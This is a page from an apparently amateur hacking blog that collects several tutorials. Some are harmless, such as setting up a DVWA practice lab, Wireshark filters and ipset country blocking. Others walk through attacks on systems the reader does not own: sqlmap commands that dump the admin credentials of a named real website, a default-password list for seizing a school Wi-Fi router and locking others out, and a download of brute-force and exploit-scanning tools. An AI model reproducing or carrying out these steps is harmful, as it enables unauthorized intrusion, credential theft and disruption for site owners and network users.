Pages

Design Your Own Web Hacking Lab On Windows

5 comments


Hello friends,today post very helpful for that person who want to do practice for make his hacking too good  . Today post help you setup your own Hacking Lab ya Your own Hacking Lab (Without any money). I think you are also interested for this because you read this post continue (i am only kidding). Total credit go to  my Friend "Shining White" who introduce me about this and i am make it too simple by add some more picture .


First Download Below Write Tool :

1. Download XAMPP


2. Download DVWA


About DVWA( Damn Vulnerable Web App)

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Includes : 

BruteForce
Command Execution 
CSRF - 
File Inclusion
SQLi
SQLi (Blind)
XSS Reflected
XSS Stored 
and more







About XAMPP

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use

Contain : distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql
I hope Most of you know about it , 






Extract XAMPP Into C:\xampp

After Extract it go to C: Drive and Open folder XAMPP where you see a folder which name "htdocs" , enter in the htdocs and Delete all Files On htdocs Folder.






Now Post the DVWA folder under htdocs folder and again go to XAMPP folder of C: Drive:





When you enter in the XAMPP folder then again search file which name "xampp_start" like below pic..




Now double click on that when you do it then a Command prompt Window open like below pic, do not do anything with that.




Now Open your any browser and type IP    "127.0.0.1" when you do it then Index open where a file present which name dvwa/ , click on that , see below pic...




When all things complete then a Login page open where it ask Username and Password so enter Username is "admin"  and

Password is "password" , see below pic...




Then a page open which say about DataBase Setup , here you see a option given in which write "Create/Reset Database" , click on that , see below pic...





Now your Lab ready for works, all options for attacks test given in left side of page , see pic..




Enjoy your own free lab , and make perfect yourself.

Sniffing Wireless Packets By BackTrack5- Part 2

2 comments


I am going to continue my old post here in which i am telling you how to apply Filter in the Wireshark.
For Read first part of this thread click on below link...




In First Post i had told you how to make Monitor Mode mon0 , Now i am start sniffing packet but a large amount of packets come here in list so how to found any selected packet , the answer of this question is Filter who help you find your packet from a large collection.

First i am telling you type of Frame. I know first thing which come in your mind is "Hey, What the f**king things is this ?"

I thought everybody know our internet is a wlan (Wide Local Area Network) , you know a wlan communicate on Frame so i thing now you know about this f**king thing.

First i am telling you about types of wlan frame , there are three types of wlan frame :

1. Control Frame : Ensuring proper communication between the access points and wireless users.

2. Management frame: Maintaining Communication between Access points and Wireless users.

3. Data frame: Carry Data between Access Point and Wireless Users .

Now i think you know about Frame Very well , i am going to start practical .

1. If you want to see only captured Management frame then Enter in filter below write code :

wlan.fc.type==0

And Press Apply button ,for example see below pic...




2. If you want to see only captured wlan control frame then type in filter box this expression :

wlan.fc.type==1

And then press Apply button , see below pic...





3. For view the Data Frame type expression which one write below....

wlan.fc.type=2


And again press Apply button , see below pic...




4. If you want see any sub-type with any frame type then write below expression :

(wlan.fc.type=0)&&(wlan.fc.subtype==8)


Change Number according to your selection , see below pic... 




5. For alternative frame selection , click on any packet of window and then follow Apply as Filter >>> Selected , look below pic ...





You can also use TCP ,POP , UDP and more as  filter.


Now i think you able to apply filter on Wireshark, in my next part i will tell you how to sniffing packets from your network.
  

Helpful Tool For Website Hacking

10 comments


Today i am given you some tool who very helpful for you in the Website Hacking, Today Winrar file collection of four tool which make your website hacking easy, so first start with intro.


Login Page Finder:

By this tool you easily found the website Admin Login Page by which after found ADMIN Name and Password you easily enter in the website Control Panel. 






Blind SQLi Dumper:


This tool use for Blind SQL Injection attack, I will tell you about Blind SQL in future post but this tool really helpful for you.





Cpanel BruteForcer :


This tool is works on the Dictionary Brute Force attacks , and also it's very helpful for me and now for you.





Exploit Scanner:


This tool tell you about Exploit link of any website by which you take profit about vulnerable page of the website , its tell you website name according to your demand.






FOR DOWNLOAD CLICK HERE


Password: www.hackarde.com

Sniffing Wireless Packets By BackTrack 5 - Part 1

4 comments


Hello friends, i have come again with new tutorial on BackTrack 5 , today i am telling ,how you sniff the information packets from your wi-fi network and know the information. So the basic requirement here is:

1. BackTrack 5 Operating System (Download it by help of Google Uncle)
2. A Wi-Fi or Wireless Network (Catch Collage Wi-Fi )
3. Mind (use your own )

Now first i am telling you how you can create your own Monitor Mode for catch the packets from Wireless  network.

Create Monitor Mode:

1. Go to BT5 and open terminal where write below command :

iwconfig 


This command shown confirm your wireless cards (For know about Wireless card read http://www.hackarde.com/2012/02/settings-up-wireless-cards-for-access.html ) , see below pic...




2. If your card have not UP show run command "ifconfig wlan0 up" see below pic,for confirm it run command "ifconfig wlan0" , For both command see below pic...




3. For put our Wireless Card on Monitor Mode run command:

airmon-ng 

See below pic...



4. To make Monitor Mode on wlan0 device interface run command :

airmon-ng start wlan0


When you did it ,a monitor mode interface create which name is mon0 , see below pic ...




For see Monitor Mode mon0 run the command :

airmon-ng 

See below pic where you able to see mon0 mode...



5. Running ifconfig should now display a new interface called mon0 , see below pic...




Now you successfully create a Monitor Mode which name is mon0 , now i am going to tell you how to use this mode and sniff the packets from the wireless networks.

Sniffing Wireless Packets:




1. Open a new Terminal on the Backtrack 5 and there write command :

wireshark

Wireshark is tool which included with BackTrack5 when your run above command then it run see below pic...



2. When you run "wireshark" command then a window open like below pic...



Here click on "capture Options" see above pic.

3. When you click on "capture options" then a window open where go to interface and select "mon0" see below pic...



After select monitor mode mon0 then click on "start" button see above pic.


4. When you done step 3 then Wireshark start sniffing ,see below pic...




This is the 1st Part of Sniffing Wireless Packets by Backtrack5 ,in upcoming part i am telling you how to applied filter on Wireshark and also how to found sniff packet in plain text.

So always connect with me for new and interesting post , Your reply encourage me for write g00d post for you.

Block IPs Of Country And Stop Hacker

5 comments



Some times you want to break access of some IP from a country to your website, so how to stop him ?

Somebody told you use application mod_geoip with Apache and also more but this application isn't globally.If you use Apache to block IPs, still many ports are open to blocked country. So here i am going to tell you one another things which works with Linux OS for block IPs.





Here i am tell you about IPSet  for make object successful so i am starting with introduction of IPSET...


ipset is used to set up, maintain and inspect so called IP sets in the Linux kernel. Depending on the type of the set, an IP set may store IP(v4/v6) addresses, (TCP/UDP) port numbers, IP and MAC address pairs, IP address and port number pairs, etc. See the set type definitions below.
Iptables matches and targets referring to sets create references, which protect the given sets in the kernel. A set cannot be destroyed while there is a single reference pointing to it.

Feature of IPset:


1. Store Multiple IPs and Ports on the Table and doing matching at the working time.
2. Dynamic Update of IPs and Ports without low performance.

We will need the Source Code for install IPset on the Linux so for it always used Current Kernal. Mostaly the Kernel Source Code is found under  /usr/src/linux-<version> which access as
  /usr/src/linux-(uname -r) at shell.

There are two version of IPset available ...


For the new branch
linux kernel source code (version >= 2.6.34)
source of ipset: ipset-6.11.tar.bz2 (md5sum)
For the old branch
linux kernel source code (version >= 2.6.16 or >= 2.4.36)
source of ipset: ipset-4.5.tar.bz2 (md5sum)





Installation Of IPset:

Open your Linux Terminal and follow the steps.

First Extract the ipset, here i am try ipset-4.5.tar.gz ....

>tar -xf ipset-4.5.tar.gz

Now going for change the directory to ipset-4.5....

>cd  ipset-4.5


Here i am consider the kernel source code available at /usr/src/linux-(uname -r) ,so i am going to compile ipset:

>make KERNEL_DIR=/usr/src/$(uname -r) IP_NF_SET_MAX=256 IP_NF_SET_HASHSIZE=1024


Here IP_NF_SET_MAX controls the maximum number of IPSets and IP_NF_SET_HASHSIZE set the default size for hash maps.

Now , i am going to install the IPset ,i thing you would know about  "sudo" or "su -c" ,lets run command...

>sudo make install        

or 

>su -c 'make install'

After installation you will be ready for Block IPs.


Creating IPsets and Add IPs :

See below command :

# ipset  -N  countries  nethash


First thing is here, above write command execute as root ,and this creates a ipset which name is 'country' of type 'nethash'  , i am explain it step wise step see....

'Countries'  each set can be found in ipset and start adding IP address to set.
'nethash' is a set type, if you want know more then going to here  http://ipdeny.com/

We had created set named "countries" , now start adding IPs address to the set ,if i want blocking china IPs so add IPs of this zone from here http://www.ipdeny.com/ipblocks/data/countries/cn.zone

Here i am use simple for-loop for get to retrieve zone files:

# for IP in $ (wget -0 - http://www.ipdeny.com/ipblocks/data/countries/cn.zone)
> do
> ipset -A countries $IP
>done

Now all the IPs are add in countries set if you want to add new IPs so i am tell you a nethash store up to 65535 address,if you want add more then make new set for these.


I think my this post very helpful for a website admin if you want know some more command and information then click below link:





Please given comment and tell me you like or not my this post.





How To Install Android Ice Cream Sandwich On Your NoteBook

4 comments

Today I am going to show how you can install Androidx86 latest version of Android Operating System also called ICE CREAM SANDWICH on your NoteBook.

What the profit of  doing it? I think you never want to spend money for buy a new Android based Tablet PC. So now let's start.









Next Work makes Android Download .iso file boot-able so for this use tool  UNetbootin   and your PenDrive .
Enter your PenDrive and make bootable file on it by help of  UNetBootin .Below i am showing view of UNetbootin ,see pic...




When Your PenDrive ready for work then Enter it on your Notebook and  START your Notebook , When your Notebook  boot for OS then Press Key F2 or F8 then a blue screen window open ,here going on Boot Section and and select the Removable Device , see below pic...





When your NoteBook Start booting by Removable Device means by your PenDrive then a screen come like below pic...





Here Select Installation-Install Android-x86 to harddisk , then processing start it take some time.





And after some times your Android based NoteBook start working. Problem comes in Some Application at running  time but it work very well for you




So Enjoy your Android Based NoteBook .

[Video Tutorial] How To Hack IIS Exploit Website

4 comments


This Video Tutorial Made for those person who want to know about IIS Exploit Website Hacking  


Website Hack will be making very simple when you follow this video steps. 





How To Hack School Wi-Fi Router

16 comments


My this post helpful for you on hacking your school wi-fi router.Basically this thread write for Newbie so if you works on Intermediate level of hacking so it is not for you.

So friend by hack your school router,you change all the settings and also restrict the other person by internet. You also trace the Request of your friends which send to server by him.

First open your Command Prompt or CMD. Going to RUN and write CMD and then press RUN button,when you did it a black window open like below pic.Here write command "IPCONFIG" see below pic..



When you press ENTER Key after write IPCONFIG ,you found your IP address also Default Gateway.

In my case i had found IP 192.168.0.8 and Default Gateway 192.168.0.7  see below pic...




This Default Gateway is the address of your School Wi-Fi Router Admin Page ,so Open your Web Browser and write the Default Gateway address 192.168.0.7 on the Web Browser address Bar.When have you done it then a page open which want Username  Password ,see below pic...



Mostly School and Collage Wi-Fi not Secure, a Router come with username and default password means mostly router have Username is "admin" and no any Password. And your Faculty never change it so you use below write Username and password combination for access the admin page...

Username:Password Combinations:

admin:admin
admin:administrator
admin:password
admin:
administrator:administrator
administrator:admin
administrator:password
administrator:
guest:guest
guest:password
guest:


 In my case,I am use D-Link Wireless N Router in which Username is "admin" and no any password by factory side,So i am write only admin and press Login,see above pic.

When all thing going on according write in upper part of this post then you see Router Admin Page like below pic...




Now going to "Tools" and then "Admin" and change Username and password ,it never want old save information. See below pic...




I think my this post helpful for Newbie.If you like my Website so plz Follow my Site.

Enjoy Hacking!!!!

SQL Injection Attack by BackTrack 5

14 comments


Hello Viewer, Now i am come again with my new thread. You like my old post  Hack Facebook,Gmail,Yahoo and Twitter Account by BT5  so thanks for it. Now i am going to write my new tutorial in Backtrack Series.

I think you would know or hear about SQL Injection, IF you say "YES" so it's is good or else you say "NO" so please read about it by my old post...




I think my old tutorial is too good and also very helpful for a Newbie. Here i will going to tell you only How to Doing SQL INJECTION  Attacks by BackTrack 5.

So Follow my steps and done it successfully!!!!

NOTE: IF you face some problem in viewing the picture clear,so open the picture in new tab.


STEP1: Below pic show you a website which name is www.junincc.com.ar ,Now i am used my Backtrack Skill and find that website Admin name and password.





STEP2: Open your BackTrack Terminal and Write "cd /pentest/web/scanners/sqlmap"   and Hit Enter Key like below pic...




STEP3: Now i am going to find out Website DataBase name,so for it write...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs


For Example see below pic...




STEP4: When you done step 3 then you see after sometime processing a list of DataBase name come like below pic in which all name under RED color ring...



Now choose any DataBase name for Forward Processing.In my case,i am select "junincc_junincc".


STEP5: After select DB name now write on forward step...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables


i am write these command for find tables name under DataBase junincc_junincc  see below pic...





STEP6: When you have done step 5 then you see a list of tables come,In my case you see below pic where tables name in under of RED color ring....




Now here i am select "usuarios" for find out columns name by Tables.





STEP7: For Find Columns name of any Table write below command...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  --columns


See below pic...




STEP8: When you have done step 7 then you found a list of Table's columns,see below pic all columns name in table  usuarios write in RED color ring...




Here i am select two Columns name for future work which name is " clave , usuario " .



STEP9: Now i am going to find about columns information which save in column "clave , usuario" ,so run these command......

python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  -C clave,usuario --dump


See below pic...






STEP10: When you run step 9 command then in some steps it ask for forward processing show you write "Y"  and press ENTER KEY,see below pic...





STEP11: Wait for some time then you see result like below pic...





Here "admin" is the ADMIN account ID Name and password encrypt in MD5 ,For Decrypt it go to online MD5 Decryption Website and Decrypt the Password of Admin site.


I hope u will be successful in your work,so all the BEST!



IF YOU LIKE MY WEBSITE SO PLEASE FOLLOW IT AND MAKE ME STRONG FOR FUTURE,THANKS!!!!!

Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

Loading
 
HACKARDE © 2011 | Designed by HrDe